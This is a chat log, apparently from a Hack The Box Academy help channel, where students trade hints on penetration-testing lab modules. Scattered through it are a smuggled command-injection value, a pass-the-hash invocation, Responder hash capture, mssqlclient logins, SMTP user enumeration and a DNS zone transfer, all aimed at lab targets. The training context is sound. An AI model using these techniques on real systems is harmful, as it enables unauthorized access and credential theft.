and you may be able to get it that way

Hello im working on attacking common services module in section attacking common services - easy. i have user and pass and im trying to upload a shell through mysql but im unable to can anyone help?

Thanks, I specialize in Linux, so Windows hurts me, lol, but I am getting the hang of it

I'm having a weird one, doing the NMAP module and I'm enumerating services to find a flag but I can't seem go find it. I've tried manually scanning each port. Ive also been running tcpdump whilst also manually connecting via NC to each port to see if its been hidden in some weird header. Have I missed the point of the challenge?

Or am I to actually enumerate the services and find a vulnerability in the service itself?

nope, enumeration should be enough, but sometimes the service takes too long to respond so nmap just gives up

Thanks for the hint, will get back to it.

the script banner may timeout and you get nothing back, I am not sure how to increase the timeout, but if you nc ip port and wait it works also

ok, than I know this with LHOST, but why they told two and I see six required with yes?

the others are pre-populated with default values that are usually fine

but LHOST for your payload callback and RHOST for the target youre running the exploit against still needs to be added

ok, then I don‘t have to look at all required with yes and set something. Therefore they told two. I understand. thanks.

if it says yes and is blank then definitely have to set something otherwise usually can ignore it.

that said its super exploit to exploit dependent and you should be fully understanding an exploit and what it does before running it.

At these early stages with controlled labs and still learning the basics its fine to be a little loose with this, but if you get to the point of doing some real world stuff youll absolutely need to be capable of that understanding.

now, I understood.

Hello im working on attacking common services module in section attacking common services - easy. i have user and pass and im trying to upload a shell through mysql but im unable to can anyone help? when running curl i get the error "header without colon"

https://dontasktoask.com

Thank you for the help!

Pm what what you've tried and I'll nudge you

I need help with the Osint Corporate Recon module with this specific question : What are the city's coordinates where one of the company's offices, "inlanefreight.com" has its headquarters in Germany? (format: 00.0000 N, 0.0000 E) I'm stuck because the coordinates I got from google dont work and I''m pretty out of options

hello am stack in Cracking Common Hashes, i think its a ntlm hash, i used a bunch of rules but i dont seem to get something

Thanks. I've understood. For now on, if you got an hint since I'm specific, I'll take any 🙂

try changing your google region settings to the country from where oktorberfest originates

I was also going to say are you sure you have the right city?

Cause the city I found seems to be different than the incorrect city people complain about in the forums.

but ive also not done that module so I cant confirm if my answer is correct

Set the language of the browser to English

I've set the browser in english and the country in germany and i got the same result here :

can't share the screenshot weid

cause your account isnt verified

i got this in fact : 51.0951° N, 10.2759° E

not the city I found

You didnt found Frankenroda ?

nope

but caveat again, Ive not completed the module so idk if my answer is correct either

but the inlanefrieght blog has a fun little offices section

not sure where people are finding frankenroda from

Ok you've got me to find it

The city frenkenroda is directly from google

and the other town you got me to try is on the site

so we got 2 options for the answers

Thanks a lot to all of you

Dumb question, but on the SMTP section of Attacking Services, I got the creds but need to log in. Anyone able for a nudge?

Anyone else have no internet access on the Live Engagement, Box 2? This is the one with the blog. I've searched high and low in Metasploit for the indicated exploit, without luck and so am assuming the path is to get the exploit into Metasploit...just not entirely sure how to effect that if the victim box has no internet connection. If anyone has a clue, I'd be grateful! 🙂

https://europe1.discourse-cdn.com/hackthebox/original/3X/8/3/8310199666abfde6425cff746d05613d59625d33.jpeg

Any idea why this wont work

Is the module properly loaded? Check with Get-Module. If it is loaded add -Verbose to read the output and troubleshoot from there

Can I dm someone about the easy footprinting lab? I have already completed the module, but I am going through and making a walkthrough for future reference and to reinforce the information, but now I believe that something is not working the way that it should be anymore.

https://imgur.com/NrJG5p2 - looks to be same thing but the module is loaded

hey guys im on attacking common services and on mail section. im stuck at the beggining. i tried enumerating users with smtp-user-enum but i got nothing

🤷‍♂️

i used the provideded user list in resources

been stuck on this for some time, tried doing it alone but not working for now...

nvm... i found the user.... sorry

Hello. Need help on the last question for Pass the Ticket (PtT) from Linux.

let me pull up my notes, sec

do u mind reminding me where r u at rn?

like what r u stuck at

yeah just sent a dm

Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. Can someone help I am stuck on this module.

fuzz it

what r u stuck on, u dont know how to fuzz with burp?

Well no and according to what I have searched its not Burp that will solve this I believe Zap has to be used

I make the Question from Public Exploits. Now the Metasploit said: Msf::OptionValidateError The following options failed to validate: RHOSTS.
I want to know if this error occurs perhaps because I was too slow and the IP:Port is no longer valid? Or does that means I have to use a different exploit?

Hello im working on attacking common services module in section attacking common services - easy. i have user and pass and im trying to upload a shell through mysql but im unable to can anyone help?

Hey guys, I'm trying to solve the command injection skills assessment. I found the parameter and I think I have the operator. I received ||Malicious request denied!|| from the server, but I'm stuck there

no, u can use burp too

Ok

wrong reply*

there ks bunch of fuzzers

any of them should work

but if ots intented to teach u how to use burp then use burp ig

Nvm literally just figured it out one minute later

ok I just don't understand how to fuzz with Burp

In my modul no is something with burp.

i replied to wrong one

sorry

what module is that?

Public Exploits from Cracking into HTB Getting Started

the error is RHOSTS?

did you set rhosts?

rhosts = target

if you don't set rhosts you don't have the taget for the exploit

I have put RHOSTS und LHOST. But now it said 178.128.46.49:443 - The target ist not exploitable. Connection failed. But I have tried also, that I put the Port 31513 from the target (Question) for RPORT and for LPORT, but in neither case did it work.

can you type show options and send a screenshot please

most of the time you are not needed to provide the port for the rhosts except if the service is on uncommon port

Having an issue in the Query Results section of SQL Injection Fundamentals. I think I have my query formulated properly, but I'm getting a result of Empty set, 1 warning. My query is as follows > Select * FROM employees WHERE first_name like 'Bar%' AND hire_date = 1990-01-01;

Can you see something? It said: 178.128.46.49:443 - The target ist not exploitable. Connection failed. Therefore I thought, that I have to change the RPORT.

is the rhosts your target ip?

yes

I work with openvpn. Shell I change to the integrated spawns?

doesn't really matter

are you sure its the right exploit?

i dont have notes on this soo i dont know...

Sure? no. 🙂 With searchsploits I have found this. Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) (multiple/webapps/50383.sh)
But I didn't know how to put it in Metasploit Framework. But now I have an idea. I can copy this and can put it into Metasploit Framework.

edit: no, that didn't work. I have tried it with another exploit but this no works, too.

edit-2: I've forgotton to see into the Hint. That told me that I have to search for plugin exploits. --> I want to make it now.

Is this the "Getting Started" module, Public Exploit?

If so: then you will need to navigate to the webpage via http://ip:port/

That will get you the info you actually need to exploit

Thanks a bunch. I was stuck on this for a while lol

Unfortunately, it never occurred to me that I could take a look at the website. 😕 But now I have only one exploit. 😄

Yeah I feel super dumb lmao

Whenever you're given IP:PORT it's a docker container, meaning website

were you ever able to get this figured out? I haven't been able to get the exploit into metasploit for some reason

It also doesn't follow the 10.x.x.x format of other targets in other modules

For the OSINT module, I do not see any other cities listed that could be headquarters for inlanefreight.com other than Oberhausen, Brighton, and Denver. When I put in the latitude and longitude in Decimal format that I find from Wikipedia (geohack.toolforge.org) for each of these cities the answer is incorrect. What am I missing?

Has anyone here gotten past the Query Results section of SQL Injection Fundamentals? I could use some help with the query needed for this section. I'm not sure why mine is wrong.

im doing attacking common services email section and i've found the creds but i do not know where to use it to log in?

well if its the email section have you tried logging into the email

haha

yeah

but before i've used evolution but now its not working for some reason

so idk whatelse to use

I just use netcat

netcat? how so

its just a text protocol, the section goes over it

no it doesn't 🤷‍♂️

okay it uses telnet, same diff

manual is still intended route

yeah, but when i try to run command on telnet

i get this error

"503 Bad sequence of commands"

well u can re do them

means you entered it wrong

¯_(ツ)_/¯

Can anyone help with the File Upload Attacks -> Limited File Uploads module? I got the first question but having issues with the second question. The only thing I can do is read the content of /etc/passwd .

i just tried VRFY root

then i tried the same cmd with the user i have

always same thing

why are you trying to vrfy root when your goal is to login

Never mind. It helps to put ' around the information you're querying for.

its a bit annoying cause the section doesnt actually tell you how to check mail manually or login manually, you gotta do some googling

one of the two services was easier to do by hand than the other but idr which one

yeah im doing that rn

but its not like working

so idk if i maybe got false positive with hydra or sm

for the password...

First I was able to browse the server on the target with the right exploit. But then I accidentally closed the terminal and now it only searches my own computer and no longer the target computer, even though I entered the correct IP under RHOSTS. Do you happen to know what I messed up here? Because I've been at it for a long time and have tried many things, but I always end up on my computer.

In case anyone needs this, you have to use Google's coordinates, not any other service. When asking correctly the answers are big numbers at the top of the result.

Can i dm somone about attacking commons ervices easy

ive been stuck for 10 hours

Sure

thanks dmed you

Hello everyone, could someone help me solve the second question in the PHP Web Shells section please?

this is the question: Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: ****.gif)

someone can give me a hint? I can't get any further with the exploit I found. I can't access the server with it. At least I can't. Now I read in the description of the exploit that the file can be downloaded directly from the website. I'm trying to use the exploit's instructions, but I'm always downloading a file that's empty.
Who can give me a tip please? I've been trying to answer this question for many, many hours now.

would love some help here... lol

javascript secure coding 101

You have to ask Google nicely for the coordinates of the relevant cities. Not search for the full domain.

who can help me the skill assessment "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them."

maybe: get-module xyz | get-command

or look for the places where modules are installed on disk

no hava

first you must find the Domain's password

do you have to guess it?

fuck I was finish,I am not nocie

The right RHOST is the IP but you also need to put in the right RPORT

It's same username/password for that user

Also maybe change the Filepath

hey is anyone available tomorrow at 3 to 4:30 PST to help me one on one with the Intro to Network Traffic Analysis module's Interrogating Network Traffic With Capture and Display Filters section

I need help sifting through a fuckton of TCPDump output

I do what the instructions say but there's just so much output here

to sift through to find what it wants me to find. I can do it but just need a little help narrowing down output. Here is command I normally use:

sudo tcpdump -Sr TCPDump-lab-2.pcap

That doesn't narrow it down enough for me I don't think

I tried researching it and I tried some stuff off stack overflow for someone who had a similar issue to just get TCP three-way handshakes but to no avail

DM me if you are available to help tomorrow

or actually, DM me if you are able to help any time between 2:30 and 5

thank you

Module : INTRODUCTION TO WINDOWS COMMAND LINE
Section : Skill Assessment
Question8 : For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them.

hi i have been lost 1 day, i have run the module Get-Flag and its said : the flag you are looing for is

i try find the module but im lost. can you advice me what to do?

This is a spoiler but try removing the {}

OH GOD! i made a silly thing! thanks so much

Module: Password Attacks - Pass the Ticket (PtT) from Linux - I am stuck on the last question.. The question is: Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

I was able to retrieve the flag.txt from \DC01\linux01 but that flag doesn't start with Us1nG and its not accepting what I did find...

Remove the flag from your post @solemn gull

Does it have a couple unreadable characters? If so then don't include thos

yes i have remove it, thank you

Not sure I understand what you mean.

hi can anyone help me right now with this module?

DM me the flag you have

Cause it may be the issue I think it is

like I don't need to wait until tomorrow if someone can help me right now

Ah different flag are you sure you used the right file: hint the Linux01 is in a different location completely

For the keytab

It's more of a cache

hi I need help with the Intro to Network Traffic Analysis module. Anyone able to help me tonight?

Just be patient dude it's a Monday so most people are probably busy

ok sorry

I used the one in /etc is that the wrong one?

did no one really do javascript secure coding...

Yes

Iirc one of the example images shows you where to look

just use wireshark

the point of this section is to use TCPDump instead of Wireshark

the next four sections after this one are on Wireshark

Though I found it by stumbling around. Just think about the info you find from realm and that there must be a __d__aemon that runs it (so {service}d) @obsidian crescent

You will find your Linux info there :)

I'll give it a go, thank you!

shoot me a dm because the section doesn't show you how to filter a tcp 3 way handshake in tcpdump

ok

So it doesn't show how to get the syn,Syn-Ack,ack handshake?shame

i mean the it did show you the absolute tcp sequence numbers tag which have the right answer you just have to find it in 535 word all dumped without color

Gross

Hi all. I am trying to redo the AD enum attack skill 2. The first time I did it I rember getting the admin hash on the 7.60 host by launching lazagne as admin an reuse the hash in 7.50. But now I get a different hash and this one doesn't work on the first host. I can figure out why my output are different this timei I missing something? 😅

Thats the way

But why my hash are different? I don't suppose to get a hash valide for both host?

😢

Can figure out what I missing this time. It makes me crazy 😅

Ccn you give me a hint?

Hello guys,
I have a show and i don't know what should i do, can you give me projects or idea for the show?.

Can you take your certification from hackthebox and use it in jobs?

yeah this is a bit too much spoiler i would say

this isn't the best place to ask this

yep

Ok where.

maybe #general this channel is for the academy modules

I am not sure if it is a spoiler at all. @spiral pelican told me already used lazagne

i mean the process chain is spoiler of course the topic is showed in the section but reviewing what to do in each step here is a bit too spoiler (here)

hinting the path is completely ok in DM

Srry about that. I ll ask in dm in place 😅

anyone have completed this Bypassing Blacklisted Commands

need help in this

ip=127.0.0.1%0aw'h'o'am'i this command is working fo me but how can i make call for user/home/flag.txt

cat I guess

yes but not working that

what cmd will be

that's for you to find out, try to have another go at the module content the answer is there and don't give up 💪

try to check step by step which char is blacklisted and go from there

check the cheatsheet, there you can find some useful commands to help you craft the end command

anyone who completed File upload skills assessment??
seems I stuck there for a while

unable to read upload.php, have no Idea

Hello I’m trying the module introduction to python 3

And I’m stuck in the question “the type of foo from question 1 is class set . What is the type of x_coordinate ?

Can anyone please help

Passwords attack: PTH Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.

Q: How can i find DC01\david , i -list shares from david user with his hash using cme and there is no DC01\david. evilwinrm> ls \dc01\david -> path not found

file upload attacks/blacklist Filters i cant get the webshells to work. it wont execute the php and asp

i will dm you

hii

Hi. Some one is available for giving help in AD enum? I have a very strange issue and I don't want to write any spoil 🙂

anyone who completed File upload skills assessment??
seems I stuck there for a while
unable to read upload.php, have no Idea
I was able to get the extension by wordlist and now idk how to read upload.php
anyone who can help me with it? and I do use 'ÿØÿà' to use payload, in return I get nothing if I check response the same code but converted to base64

how would one find the community string

this is for the hard footprinting module

ik u need to do something with snmp but snmpwalk times out with the public string

cant believe i glossed over that

thanks

No one?

https://www.geeksforgeeks.org/python-type-function/

anyone who completed File upload skills assessment??
seems I stuck there for a while
unable to read upload.php, have no Idea
I was able to get the extension by wordlist and now idk how to read upload.php
anyone who can help me with it? and I do use 'ÿØÿà' to use payload, in return I get nothing if I check response the same code but converted to base64

also I cannot upload svg file, even if I delete those two line via inspecting the page

Think about php filter

Who Ping Me

cant seem to log in to the mysql server on the hard footprinting lab

ive got the user and the password

it just outputs all the help options

nvm

got it

lol

Hope I can get a little help. I am sooo new and I'm stuck on the introduction module. I do not understand what I'm supposed to do when I am spawning and trying to find out the answer to the question. Can I get assistance on what I am to be doing?

sure what do you know so far

literally nothing. I have no idea how to spawn or what i am to be looking for

I just started learning the basics on information technology and trying to get into cybersecurity

getting this error for mysql ERROR 2002 (HY000): Can't connect to MySQL server on '10.129.125.31' (115)

Anyone has this error too? idk what to do with that

when I have the IP for the spawn. obviously i am connected to the same internet i'm assuming but when I'm an to be looking for the proof text am I suppose to be using the PowerShell to find something using basic commands?

so using the work station you will open firefox then from there you will put the target into there it should show you some result

make sure its in the spawned enviroment

ok

wow, went way over my head. I may be slow at this but I'm and dedicated to learn it

thank you

No worries man I'm going through the same pain as you so I know how you feel hope your journey goes well

thanks

Who can help me solve this problem in the user where to look，question "Who can help me solve this problem in the user where to look"

Module: Kerberos Attacks
Unconstrained Delegation - Users

Need help.

Successfully retrieved tgt from dc01, yet can't perform dcsync with impacket-secretsdump (after exporting KRB5CCNAME) = No output. Tried psexec, yet receive "Name or service not known".

Edit: Nvm, i figured it out. Needed to add additional flag to secretsdump

hey, i have a difficult time in AD Enumeration & Attacks - Skills Assessment Part II q10, could someone give me a nudge?

Any ideas why my smtp-user-enum is not returning any results for the footprinting exercise? I have set -w 25 and have the correct target IP + file path and name list. Here is my command: "smtp-user-enum -M VRFY -U /opt/useful/SecLists/namelist.txt -t 10.129.163.85 -w 25". It is just continuosly running and not giving me any results.

Hi all, at the Password Attacks module, Credential Hunting in Linux section I try to ssh to the server with te credentials provided in the hint, but with no success. Am I missing something?

Module: ATTACKING COMMON APPLICATIONS

Section: Attacking GitLab

i have been enumerating users for the past few hours and i have not gotten any valid users.

i am currently using the xato-net-10-million-usernames list. i tried with multiple shorter wordlists from seclist but did not get anything.

Anyone still need help?

Im still stuck on Pass the Hash (PtH) - Windows Lateral Movement - last question lol

which module?

https://academy.hackthebox.com/module/147/section/1638

Seems like im following the steps correctly but when I try to use invoke wmiexec - nothing happens, Not even an error

https://europe1.discourse-cdn.com/hackthebox/original/3X/8/3/8310199666abfde6425cff746d05613d59625d33.jpeg

alright give me a second to boot it up, I dont have notes

no problem

please me

.

Ok I am back and I didnt get the flag with the reverseshell

So I dont even have to use smbexec?

I used that but i didnt use it for the shell

whats odd is when I run even that command, nothing happens. https://europe1.discourse-cdn.com/hackthebox/original/3X/b/1/b144fa7b3bc360e2d129d5521aaaf07d23ce5d40.jpeg

Shouldn't I get an error at least?

Ive gotta be doing something so stupid for it to not verbose anything

for you i think its the .\

When I dont use the .\ it gives error that the term cant be found

This one?
Crack this user's password hash and submit the cleartext password as your answer.

psd1

Import-Module .\Invoke-TheHash.psd1

then
Invoke-SMBExec -Target 172.16.1.10 ......

wow I think this was it lol

this whole time I just needed 1 letter

🎉

So my brain can understand, can you or anyone explain the difference between those two files? they are the same name but one is ps1 and the other is psd1?

thank you!

use ||hashcat|| to crack this NTLMv2 hash
|| https://hashcat.net/wiki/doku.php?id=example_hashes ||

You still need help?

yes please

Alright so what are you trying to do?

ssh to the server with the credentials provided at the hint of the question in order to obtain the password of the user Will

the last couple of hours I am trying to brute force my way in as the creds are not working, with the lists of usernames and passwords provided in the resources

alright im on it, give me a min, no notes

i think i'm being dumb, but i'm having issues parsing this question in the "dns enumeration with python" module: submit the one unique record in double quotes as the answer.
does this mean that the -answer- should be in double quotes? or that the -record- is in double quotes? and is it looking for the type of record, the value of the record, or the full dig/nslookup output for the record?

There is a record that contains a string that is enclosed in double quotes.

ok got it finally. was just very confused by what it was looking for

ok i got it

first they give you a password list and a set of rules, but the hint can allow you to focus on some passwords

using that, create a mutated password list

ohh.. ok thanks, that was unnecessarily misleading

Has anyone finished the shells and payloads module?

Yes

Hello everyone, could someone help me solve the second question in the PHP Web Shells section please?

#Module: Attacking Common Services
#Sections: Attacking SQL Databases

Once the mssqlsvc password found, you can connect on the db using domain authent with the following mssqlclient.py command :

||mssqlclient.py -p 1433 WIN-02/mssqlsvc@10.129.33.61 -windows-auth||

Thanks

hi i can't use daily free pwnbox. when i started it see this error:

Error!
You have used your allowed pwnbox time

"You have used your allowed pwnbox time"

nah dude i haven't even been on htb for a week

he guys im still stuck on attacking email on attacking common services

i got the creds but can't log in :DD

check credits make sure there are no spaces

no the thing is idk how to log in

i tried via evolution, it didn't work

i tried telnet, no

my f**kingh htb openvpn does't worked in windows so i cant do machines

https://help.hackthebox.com/en/articles/6369713-installing-parrot-security-on-a-vm

when it rains it pours

i came i saw

does anyone can use htb openvpn on windows?

Probably not. Since it makes more sense to use the VPN in a VM that you're attacking with

And can cause problems

my friend does, he uses ubuntu subsys on windowow

but i wouldn't recommend tbh

he just does that cuz he is lazy to install inux

linux

Need a nudge on Broken Authentication - Brute Forcing Passwords, I'm definitely missing something obvious but can't put my finger on what

my 6gb ram's reaction to that information

do dual boot then

you are right or i will buy new ram

that works too ¯_(ツ)_/¯

Do anyone know of any award-winning online ctf competitions? xD

No

i've earned good money for ctf competitions but now days they are not dont do it

This is not the channel anyway for that discussion: see #rules and #welcome

oh soryy my bad

its not working, idk if i got

false positive

creds

stuck on this for like a day lmao

annoying af

Use the provided username list. Iirc there's a tool that does VRFY for usernames you provide it

no i got

the creds

i just cant log in

or don't know how to i

ig

Are you using user@email@ip?

:)

no?

i tried using telnet

AUTH LOGIN

and then using the creds but it is not working

Aka fake@example.com@ip

via what?

Isn't there pop3s or IMAPs running?

It's been a moment since I did the email ome

One*

shi, ur right

i've been trying smtp only

guys i have a question

i tried using openssl and i get this:

witch version of parrot is better?
security audition OR Hack The Box Edition ???

Try connecting to standard IMAP / POP3

They're the same thing

Also you didn't specify protocol

u mean :imaps

so what's the difference between them?

Default tools installed, but there's the same access to the repo tools

¯_(ツ)_/¯

HTB edition just gives you some HTB background images

Similar images to what's on the pwnbox

At this point we are straying from topic, read #rules and #welcome

ok i got it

thanks

oh
does we have role for HTB academy?

Not unless you subscribe to silver annual: however an account on http://app.hackthebox.com is free

I think that there are some parts of Academy modules that should be improved/changed. Someone should consider putting a separate feedback form where we could suggest corrections.

#858470491676737536

I am doing the Firewall and IDS/IPS Evasion Medium Lab and the wording of the hint is confusing.

What's the wording?

"During the meeting, the administrators talked about the host we tested as a publicly accessible server that was not mentioned before."

Ah

Okay that implies that the host that I am looking for is not the IP I have been given?

Just do your normal enumeration

And there are other machines on the subnet

It is not implying that

It is stating that there may be a service running that needs to be publicly accessible

Just enumerate the host

Ahhh, okay. Not to clear from that wording but thanks for clearing that up.

And work from that

All the info you need to solve it is in the module

I get that, but if the wording isn't clear I could be trying to enumerate the wrong machine......

The wording is pushing you towards DNS

Hint: you may not get it with TCP

need some nudges/help with a few things on Broken Authentication in the dms

Module : Osint Corporate Recon
Question : What is the hosting provider for the inlanefreight.com domain?
I tried Shodan and got : DigitalOcean, LLC. Tried multiple way to write it without results

Anyone can point me toward the answer please ?

Password Attacks - Lab Hard - Is there any easy way to mount a drive ?

I have it, I just cant mount it

Use || whois with the IP ||

Use Windows or https://www.linuxuprising.com/2019/04/how-to-mount-bitlocker-encrypted.html

Thanks! - the last article was a little long and missing what i needed

@acoustic owl I'm try that right away, thanks a lot !

It worked. It was the same response but with (DOC-**) . They are really messing with us. Thanks for your help buddy !!!

yeah I'm kinda stuck on that

How?

Can someone please help me with Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.?

nmap module

what have you tried

I tried using version, vuln script categories but that did not yield a flag

I also tried aggressive scan

the sections mention a bunch of other categories to try

ok i got an idea

password attacks - lab hard - i've got a couple files from a mounted HD, but not sure what to do with them. Any hints ?

well, what are the files youve gathered

one is a file marked sam and on is a file marked system

Ok well I've managed to use some other scripts and I found a webserver and some file contents but still no flag in the output, could you give me any leads please?

well, refer to the section notes about dumping sensitive data from sam files

thanks for the hint - hopefully this will wrap it up for me 🙂

And that's a wrap for me, thanks again!

Guys?

https://dontasktoask.com

i got error Exploit failed: NoMethodError undefined method `split' for nil:NilClass Shells and payloads skills assesment. can u help me ?

thats not really a question

what are you trying and why

If anyone has finished this module, it will already help. I didn't want to give spoilers

Good luck then

I'm currently editing Hacking into HTB - Getting Started. It is often the case that I cannot run commands such as nmap, gobuster with the target IP. Then I get the message that I can't get a connection. Is that what HTB wants or what can be the reason? Because of course I would also like to try out a few commands that are explained in the module or in the previous modules. So I can practice and see how things work. Hence my question.

Are you at your own virtual machine?

I am currently stuck at the Active Directory Enumeration Module at the ACL enum section, last question. What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) I tried the commands and they don't give me result even after waiting ages. I tried writing my own commands in powershell all also not working. Tried Bloodhound but can not find the ObjectAceType in it. I see the edges in Bloodhound but idk how to get to the right info. Can someone help me with it ?

how long did you actually wait

the command ran does indeed take a long time to run

Currently roughly 7 min I think

yeah try like 20ish

ffs 😂 Thanks

A lot easier with BH. Select your user > info > Outbound Control Rights

What is the method to escalate privileges with a shell with root busctl permissions? gtfobins seems to list an enummeration command.

Did you actually try the command? What module is this for?

at the time I did that section bloodbound wasnt able to solve that question

It's for Linux Local Privilege Escalation

Tried that but all of the things I gave as answers were wrong

I can't seem to understand the command, i thought it lists communaction between services.

communication*

Just trust gtfobins and see if it does the thing

Hey All, working on Host-02 in the Live Engagement, Shells and Payloads module. In running the exploit with all settings correct, I'm getting an error message "Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass" - if anyone can help that would be awesome 🙂

Make sure you set all options for the msf module

That are required

@fathom pendant was that for moi? 🙂 If so I'm setting all the ones required, including VHOST...perhaps I have the wrong payload set?

Yeah ok got it (with the command). The thing is the command and Bloodhound use different "naming conventions" for the same thing and hence the answer was not correct

sounds right to me

Maybe LHOST, however sometimes resetting msfconsole makes it work

ah ok, i've tried it over and over, oddly there is no LHOST listed as an option from what I'm seeing

Oh yeah I'm thinking diff module RHOST, VHOST, I think maybe one other option

@fathom pendant DM'd you a screenshot of what I'm seeing

i haven't done it in a minute and not at my computer to sanity check ¯_(ツ)_/¯

no hurry 🙂 I've been at this for three days already haha

grep '+' you may need to escape and do grep '+'

Anyone available for a nudge on Attacking Common Services - Easy? I'm on the last part, just need an assist with syntax

@fathom pendant well, I finally got it by changing the RPORT 🙄

yes

sure, dm me

Can you specify which one and why

Without spawning a target you will not be able to test the commands in the examples

Attacking Common Services - Hard module

Can anyone help me please? I'm stuck .I found user F** and credentials to RDP.. tried to connect to MSSQL with it but im unable. are their other credientals or something?

then I have to do it with the pwnbox?

No target is not the same as pwnbox

Target is the "spawn target" button

Maybe MSSQL can only be accessed internally

well, yes I am working with the IP from the target.

it could also be that you don't have the same wordlist location from the example ¯_(ツ)_/¯

Like Seclist

If the target does not have an open webport then gobuster may not return anything

Por example, I have the question from the module Public Exploit. I have an target and I will tried some commands which I have learned in the modul. But with netcat, gobuster, for example, I don’t have a connection.

yes, that I have controlled. The Port was open.

But only a few commands have a connection. So, I don’t can try other commands.

Ah that requires the port as well with gobuster http://IP:port, with nmap you probably won't get anything as it's a docker container

The reason for nmap not working is to force you to think outside the box

@fathom pendant can i DM you?

Since you're not even giving context as to why: no

Ive connected to linked server and trying to get the flag but im doing something wrong.

Look around at what you can do in MSSQL

anyone

I have done so on #858470491676737536 but I think that a built-in feature in academy would be better.

quick question: without telling my secrets of HTB Academy's upcoming modules, has anyone thought of creating a path that works with other vendors besides CREST such as SANS or OffSec?

if there was a pathway for OSWE for example that would be gold

has that been actively considered?

I'm not saying its a big deal if they don't but it would be really great

I'm not complaining either way tho HTB Academy is so awesome its not even funny.

offsec is a direct competitor, so that's not going to happen

Does anyone know if windows in case sensitive?

For most things, windows is not case sensitive

i need a final hint for the hard footprinting lab

ive got into ssh and found the bash history

and know its got something to do with mysql but the ports are closed

You can access MySQL internally

with a private key?

... with the user you're ssh as

You can access MySQL via them

im so lost

Also port may be filtered, not closed

what command would i use

I didnt have to specify a port

just user and pass

You have ssh access yes?

yeah

And saw the history of how user accessed

So just... Do that

😂

will do

:)

brains becoming mush

overlooking simple things

Like... It's hard to really explain it any simpler xD

Get rest and crack more tomorrow lol

the worst thing about this is

ive done most of the leg work

but i just failed at the easiest bit

That's why I say it's def time to take a break lol

finally finished it

thanks @fathom pendant

has anyone done bash scripting

Check your nmap scan. ||Who own the FTP|| ?

Anyone able to give me a nudge on File Inclusion module - Skills assessment? I found LFI and I can view and poison the application log file. Poison is successful until I decide to poison with php code. Poisoning with php code "breaks" the poisoning and you can no longer poison the log, which means that there must be some filter that stops me. Where i'm stuck is that I cannot find a proper way to pass the shell and bypassing the filter.

The log file contains double quotes.
Make sure that you don't have double quotes in your payload

Yeah noticed that too, but i don't have double quotes in my payload and it still doesn't work

actually i'm dumb i had a space in my payload when i shouldn't have space there.. Thanks @rustic sage

Hi guys, can you help me for the WordPress hacking assessment ? I'm stuck on the last question.

Proceed as described in the module.
Find a file which you can customize and write your payload in it

list more

Hello, I'm currently on the "WINDOWS PRIVILEGE ESCALATION" module and the "Interacting with Users" section. I'm struggling with the question "Using the techniques in this section, how can I obtain the cleartext credentials for the SCCM_SVC user?". I edited @Inventory.scf to paste my IP address, but I'm not getting a response in Responder. I'm only receiving the hash from myself and not from the SCCM_SVC user. The note states, "In our example, wait 2-5 minutes for the 'user' to browse the share after starting Responder," but I have already been waiting for 5+ minutes. Please, what I'm doing wrong?

What command are you using?

sudo responder -wrf -v -I tun0

Is this to answer the question?

oh yeah, it is... have you tried procmon? It's been a while since I did this question, but it might be that you have to use one of the other techniques in the section

I tried also sudo impacket-smbserver share ./ -smb2support with same result :/

Anyone else having issues starting boxes?

Did you resolve this? I'm having the same problem...

Yes, the way the date must be entered has been adjusted

OK totally didn't spot that...thank you 👍👍

Hi everyone, I'm having trouble with the second question of the Windows Privilege Escalation Skills Assessment - Part I. I'm in but I can't elevate privileges, can someone help me please?

Why I am write "||authorization functions||" is errorn in "Active Directory provides authentication and <____> within a Windows domain environment."

it expects only one word

Both are wrong

Does someone knows what is the expected format of the answer in Error-Based SQL Injection section of the Advanced SQL Injections module

I am on the file transfers module, in the windows methods section and the first question is confusing me with what exactly I am supposed to do: "Download the file flag.txt from the web root using wget from the Pwnbox." If someone can nudge me in the right direction, it would be greatly appreciated. I don't understand where the file is, in regards to the web root, or the pwnbox. Do I need to use the pwnbox or can I use my VM? And do I need to host a server first somewhere? I am probably overcomplicating this but I am not sure where to go.

A bit of a noodle question but is there a more compact/ faster way of adding hosts to my /etc/host file? Im working on Attacking common applications module, and they give us a list of Vhosts. I just took the IP and the list and added them all to my /etc/host file, which works. But it looks trashy.

From reading it, I'd say the flag is on the web server in it's web root. You can probably use either pwnbox or your own VM with VPN. Both should work.
As for hosting a server, no. Wget does not require that

Pivoting, Tunneling, and Port Forwarding complete 🥳
best module so far

now I know the problem. I have two computer and each were on the target. But this make trouble. Therefore someone I can make something and a few minutes later, no.

Hello, I'm having a little trouble on the Dancing module. For some reason I can't connect to the SMB I think. It keep saying "tree connect failed: NT_STATUS_BAD_NETWORK_NAME" Any ideas as to what's going on?

For example, for a site like www.HTB-example.com, if I add a new file titled justtesting.php and put it inside the web root of the web server where HTB-example.com is hosted, then I could just go to www.HTB-example.com/justtesting.php in order to see the file.

Looking for a nudge on the hard NMAP AV/Evasion lab. Have tried multiple scan attempts; -sU, -sA, nb* & smb* scripts e.g.

• nmap <ip> -p <port> -sU -sV --script nbstat.nse -Pn -n

• nmap <ip> -p <port> -sU -Pn --reason -D RND:4 --packet-trace --disable-arp-ping

  Have also been monitoring via TCPDUMP & connecting with NC

Bro can help me in the last section

Can I DM ?

Yea mate

Replicate what’s happening in the SYN-Scan from a DNS port section then try connecting to a filtered port.

Thanks

I don't know about all of THAT lol

Don’t overthink it, revisit the last two sections before the labs.

did you check out every zone?

that's why i am asking

xd

there are several zones+_+

Check them all 🙂

dig axfr internal.inlanefreight.htb @<IP>
for instance

try all of them

you'll find

respect for Wrench)

Hahaha 🙂 in my opinion, watch dogs 1 and 2 are the best games ever made 😆

Watch dogs legion.. is really bad

i played both, agreed)

didn't try yet

Don’t 😅 waste of money hhah

